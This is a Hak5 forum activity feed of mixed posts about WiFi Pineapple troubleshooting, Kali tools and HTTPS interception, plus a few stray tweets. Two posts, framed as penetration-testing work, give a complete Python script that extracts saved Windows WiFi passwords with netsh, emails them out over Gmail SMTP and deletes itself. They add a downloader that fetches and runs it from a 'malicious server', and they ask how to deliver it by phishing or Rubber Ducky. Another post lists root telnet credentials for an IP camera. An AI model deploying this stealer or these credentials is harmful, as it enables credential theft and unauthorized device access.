Jump to content
Hak5 Forums

All Activity

This stream auto-updates     

  1. Today
  2. Hello, thanks for the work and effort you guys are putting into researching this. I was wondering if anyone here knows if it would be viable to do the same modifications to the DJI Go 3 app (for models before Phantom 4) in order to enforce FCC mode. Thank you in advance!
  3. I want to use Charles/Fiddler to capture HTTPS traffic from application. After installing trusted root certificate I've noticed that not every application will accept it. For example, I can intercept all requests made by Chrome, but on Firefox I need to add trusted certificate. When capturing traffic for Java application, certificate need to be added to JVM TrustStore, and in case of using Python script we need to add line of code that use exported certificate. How can I analyze requests made by some software that support proxy (so reverse proxy can be easily used), but after running it I cannot get plaintext as it needs trusted certificate?
  4. SSID Names and Passwords

    I posted this in a seperate HAK5 forum room. How do you think is the best way to deploy this code? I tested it on a Windows 10 machine. It writes all SSID and Credentials to a temp file, then emails it to the attacker.
  5. Identify SSID and Steal Wifi Credentials

    I want to be able to use the above code in a Penetration Testing Engagement, either via Phishing or Rubber Ducky. Here is what I did to test it. # Create a local directory to act as the "malicious_server" # In cmd.exe go to "malicious_server" directory C:\> cd $filepath\malicious_server # I'm using python3.6, standup a http.server C:\filepath\malicious_server>python -m http.server 8080 # Next, we can probably make this into a oneliner and apply it to a rubber ducky or phishing attack #!/usr/bin/env python import urllib.request import os import subprocess filename = os.path.expanduser(path='~\Downloads\wifipw.py') urllib.request.urlretrieve('', filename) subprocess.call(filename, shell=True) # An example of the outcome will be something like the following in an email: ssid_name1 | password1 ssid_name2 | password2 ssid_name3 | password3 The script will automatically remove itself from the system.
  6. I liked a @YouTube video https://t.co/giJYvZJVw5 DRAW MY LIFE - Jack Douglass

  7. WiFi Pineapple Mark V - Any For Sale?

    2 Mark V's for sale. One brand new in box. The other slightly used. Negotiable..Make reasonable offer. May be even willing to trade. Together or separately..
  8. OVPN doesn’t seem to work on client=0

    everything is working now :) thanks!
  9. Independiente del equipo que gane la #FinalRegia, sus fans van a estar https://t.co/NIxUohXJHA.bles durante un buen tiempo.

  10. Identify SSID and Steal Wifi Credentials

    So I wanted to convince an enterprise of the importance of EAP-TLS for enterprise wireless access points that support sensitive systems. I'm sure many of you have come across companies that use username and password for their companies access points. I'm fairly new at writing python scripts so please bare with. Credit goes out to youtube channel "pytutorials" for the wifi_passwords function. # Tested on Windows 10 - with McAfee AntiVirus # Runs a subprocess - netsh and identifies SSID names and Passwords # Packages the findings and sends wireless SSIDs and Credentials to an email # Requirements ## Sender Gmail Email Address ## Sender Gmail API Key ## Email address of the person receiving the SSID names and Credentials How can we package this into a Rubber Ducky? #!/usr/bin/env python import subprocess import tempfile import time import smtplib from email.mime.text import MIMEText from os import remove from sys import argv print('Security Audit will take one minute') # from_address = Senders email address from_address = 'who_it_is_from_email_address_here' # to_address = Receivers email address to_address = 'receiver_email_address_here' # api_key = Gmail API key api_key = 'who_it_is_from_gmail_api_key_here' #Create a temporary file to write SSID and wifi_passwords fp = tempfile.TemporaryFile(mode='w+t') def wifi_passwords(): "This writes to tempfile SSID and Password" a = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('\n') a = [i.split(":")[1][1:-1] for i in a if "All User Profile" in i] for i in a: results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8').split('\n') results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b] try: fp.write(str("{:<30}| {:<}\n".format(i, results[0]))) except IndexError: fp.write(str("{:<30}| {:<}\n".format(i, ""))) except KeyboardInterrupt: print("User stopped program!") fp.seek(0) def send_message(): "Sends an email with SSIDs and Creds" msg = MIMEText(fp.read()) msg['From'] = from_address msg['To'] = to_address msg['Subject'] = 'SSIDs and Creds' server = smtplib.SMTP('smtp.gmail.com', 587) server.starttls() server.login(user=msg['From'], password=api_key) server.send_message(msg) server.quit() wifi_passwords() send_message() fp.close() # Below self destructs the python script when executed remove(argv[0])
  11. Yesterday
  12. Hey Guys, Dwall works two ways for me. The first is it records the URL, cookies, etc., but Dwall does not allow for the client computer to connect through the pineapple to receive any of the requested information from the site. The other is thing that happens, is the browser receives the search request, but fails to log in the information of this request in Dwall. For me, I can not get the URL of the client browser to be logged in Dwall, while permitting the client computer the acces to the URL it requested. Is this just the way Dwall functions? Or do I have an issue? Please Advise. Thank you.
  13. Http Proxy

    I saw there was two mew modules, MAC Adresses & HTTP proxy. HTTP Proxy downloaded fine but kept screwing up my tetra. Had to hard factory restart it twice. I’m not sure how to implement it which could be why it causes everything to freeze. I think it’s either using too much memory or all the interfaces were being proxied. I was attached via eth1 over https but each time the interface stopped responding, wouldn’t load anything or allow any traffic through. Does any one have any insight to thia new module?
  14. Sharing bank account number and sort code

    This info could be used to kite checks and harm the person or businesses reputation.
  15. Best way to "hack" ip-camera?

    (bugmenot account) I hacked this camera's telnet. Username: root Password: noty See also: https://www.domoticz.com/forum/viewtopic.php?f=35&t=17059&start=20#p161045
  16. RT @darksim905: Well that's new. Ugh. 😂😔😲😭 https://t.co/qrEAsVI4EN

  17. What Kali tools do you use most often?

    Well, it's a good reference I suppose. :P
  18. What Kali tools do you use most often?

    yah sorry lol it needs a spoiler
  19. Nano - Not able to add clients to the filter

    Brilliant, thank you. I'll quickly find a spare and give you a bell on IRC - #legend
  20. Nano - Not able to add clients to the filter

    Get a SD in the nano ASAP, there is limited space on the device and could be the root cause of some of your issues. Once you have the card in make sure you use the format function to make sure the card is set up correctly. Also if I were you i would do a firmware recovery ASAP after getting the SD sorted. Im still on IRC if you want to go through it step by step?
  21. Nano - Not able to add clients to the filter

    Yep, clients are moving over to the filter. I'm starting to get a sense I'm doing this all wrong... Nope, no SD card yet. Just out of the box. Also, 5-10 minute scan is the same results. Yep, those are the pages I've been following. I originally followed this video - https://www.youtube.com/watch?v=eHnQwTCKe2o
  22. Nano - Not able to add clients to the filter

    The clients tab is for connected clients. adding clients to the filter would add them to the filter page, do you see them there? From memory this is for finding what other networks a device is/has probed for. Are you doing long recon scans 5-10mins? also just a thought, your using a SD card in the pineapple right? did you change the log location to the SD? Did you follow the "Firmware recovery" instructions here https://wifipineapple.github.io/wifipineapple-wiki/#!troubleshooting.md and here https://www.wifipineapple.com/pages/faq ?
  23. Nano - Not able to add clients to the filter

    So after a recon scan it collects SSID(s) and clients attached. When I select them and add to PineAP filter, it says successful. When I go to the client's tab everything is empty. In the Recon tab I select the client MAC, PineAP Logged Probes and I usually get " No Probes found. Is probe logging enabled? " It's definitely on. Nope, just a 404 error when I try this then?
  24. Nano - Not able to add clients to the filter

    Do you mean the pineapple is not collecting clients when PineAP is enabled with all options checked? Or you cant add clients to the filter? how so? do you mean recon is not returning results? or maybe the logs themselves? When doing a firmware recovery the pineapple defaults to, this indeed can clash with a home router using the same IP. However if you have already downloaded the required factory flash file then you could actually disconnect temporarily from your home network to complete the reflash. The pineapple will reboot and return to once done. And that's when you ask the community for some help :)
  25. I've been looking forward to getting one, it finally turned up. Everything went well with the firmware update and I've gone through a plethora of tutorials and videos on the first usage, but... I can't add clients to the client module, it just stays blank, even after a refresh. Also, the probe logging is a little hit and miss. Has anyone else had problems like this? I've done a few factory resets, I've even tried the firmware update but when I change the ipconfig ifconfig eth1 netmask up and try and connect to it auto loads my router device. You ever get that disappointing feeling when you really want something and then it really disappoints! That's me right now :-(
  26. What Kali tools do you use most often?

    You literally could have just left the link instead of listing every tool(and we aren't always 100% up to date, you can use the [ apt search ] feature to find a lot of things that might already be in there not listed on the site, or just for general purpose linux tools and programs you may need, like say, Chromium vs default FF.
  1. Load more activity